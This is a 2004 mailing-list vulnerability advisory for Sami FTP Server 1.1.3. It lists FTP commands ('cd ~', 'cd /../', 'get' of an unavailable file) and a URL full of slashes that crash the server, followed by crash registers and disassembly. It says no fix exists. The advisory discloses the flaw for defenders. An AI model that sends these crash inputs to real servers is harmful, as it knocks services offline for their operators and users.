Sami FTP Server 1.1.3 multiple vulnerabilities
Date: Fri, 13 Feb 2004 20:51:37 +0800
From: "intuit e.b." <[email protected]>
To: [email protected]
Subject: Sami FTP Server 1.1.3 multiple vulnerabilities
Application: Sami FTP Server
http://www.karja.com
Version: 1.1.3
Bug: multiple vulnerabilities (Denial Of Service)
Author: intuit
e-mail: [email protected]
web: rootshells.tk
greetz to: zigzag ;))
***********************************************************************
1. Description
2. The bug
3. The code
4. The fix
***********************************************************************
^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^
Vendor's Description:
"KarjaSoft's Sami brand of servers strives to provide small and powerful solutions, incorporated into the Plugin Management System. Focusing on simple configuration and small size, the Sami products still provide the functionality needed for either company or personal use. Sami FTP Server is designed to provide a fully functional FTP server, while still keeping the simplicity. With a few clicks you will be ready to share your files!"
***********************************************************************
^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^
(1)multiple vulnerabilities in commands: cd, get;
(2)at inquiries of a kind:
ftp://user:[email protected]/<many(2 and more) symbols "/">/
-----------------------------------------------------------------------
(1):
cd ~
cd /../
get <something unavailable>
(2):
ftp://user:[email protected]////
-----------------------------------------------------------------------
crash a pmsystem.exe with error in module samiftp.dll.
***********************************************************************
^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^
(1):
The mistake occurs here:
-----------------------------------------------------------------------
AppName: pmsystem.exe AppVer: 0.0.0.0 ModName: samiftp.dll
ModVer: 0.0.0.0 Offset: 0000ac53
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Registers:
EAX=00000000 EBX=00000002 ECX=00834AB4 EDX=00830608
ESI=00834AB4 EDI=00834AA8 EIP=008DAC53 ESP=0154FD48
EBP=0154FD70 EFL=00000202
CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000
OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0
00000008 = ????????
Code(Win XP Build 2600, Service Pack: None):
008DAC20 push esi
008DAC21 mov esi,ecx
008DAC23 mov eax,dword ptr [esi+8]
008DAC26 test eax,eax
008DAC28 je 008DAC44
008DAC2A mov eax,dword ptr [esi+4]
008DAC2D push eax
008DAC2E call 008DA288
008DAC33 add esp,4
008DAC36 mov dword ptr [esi+4],0
008DAC3D mov dword ptr [esi+8],0
008DAC44 mov ecx,8DAC70h
008DAC49 test ecx,ecx
008DAC4B je 008DAC62
008DAC4D mov eax,dword ptr [esp+8]
008DAC51 mov ecx,esi
008DAC53 mov edx,dword ptr [eax+8] <<< [crash]
008DAC56 mov eax,dword ptr [eax+4]
008DAC59 push edx
008DAC5A push 0
008DAC5C push eax
008DAC5D call 008DA9E0
008DAC62 mov eax,esi
008DAC64 pop esi
008DAC65 ret 4
(2):
The mistake occurs here:
-----------------------------------------------------------------------
AppName: pmsystem.exe AppVer: 0.0.0.0 ModName: samiftp.dll
ModVer: 0.0.0.0 Offset: 000036c7
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Registers:
EAX=01000000 EBX=00835270 ECX=02F4FD2F EDX=05920007
ESI=0083BC90 EDI=02F4FD2F EIP=008D36C7 ESP=02F4FDAC
EBP=02F4FDF4 EFL=00000202
CS=001B DS=0023 ES=0023 SS=0023 FS=0038 GS=0000
OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=0 CY=0
01000000 = ????????
Code(Win XP Build 2600, Service Pack: None):
008D36A5 je 008D36AD
008D36A7 mov eax,dword ptr [ecx]
008D36A9 push 1
008D36AB call dword ptr [eax]
008D36AD lea ecx,[ebp-2Ch]
008D36B0 call 008DA850
008D36B5 test ebx,ebx
008D36B7 je 008D36C1
008D36B9 mov eax,dword ptr [ebx]
008D36BB push 1
008D36BD mov ecx,ebx
008D36BF call dword ptr [eax]
008D36C1 mov eax,dword ptr [edi]
008D36C3 push 1
008D36C5 mov ecx,edi
008D36C7 call dword ptr [eax] <<< [crash]
008D36C9 lea ecx,[ebp-20h]
008D36CC call 008DA850
008D36D1 lea ecx,[ebp-14h]
008D36D4 call 008DA850
008D36D9 lea ecx,[ebp-38h]
008D36DC call 008DA850
008D36E1 pop edi
008D36E2 pop ebx
008D36E3 pop esi
008D36E4 leave
008D36E5 ret 4
-----------------------------------------------------------------------
/*Tested on: Win XP Build 2600, Service Pack: None
Win XP Build 2600, Service Pack: SP1 */
***********************************************************************
^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^
Not exist.
***********************************************************************
--
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.
Powered by Outblaze